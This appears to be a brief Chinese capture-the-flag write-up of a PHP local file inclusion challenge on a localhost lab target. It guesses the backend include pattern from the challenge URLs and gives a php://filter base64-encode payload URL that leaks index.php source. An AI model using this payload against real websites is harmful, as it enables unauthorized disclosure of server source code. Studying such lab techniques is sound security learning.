本地文件包含漏洞(Local File Include),是php的include()函数存在设计缺陷,学习链接:php文件包含漏洞总结
题目的url都是类似这种:
http://127.0.0.1/web500/index.php?action=front&mode=index
http://127.0.0.1/web500/index.php?action=front&mode=newnote
http://127.0.0.1/web500/index.php?action=front&mode=delete
猜想后台代码可能是这样:
include $action.'/'.$mode.'.php'
于是利用文件包含获取index.php源码:
http://127.0.0.1/web500/index.php?action=php://filter/read=convert.base64‐encode/resource=./&mode=index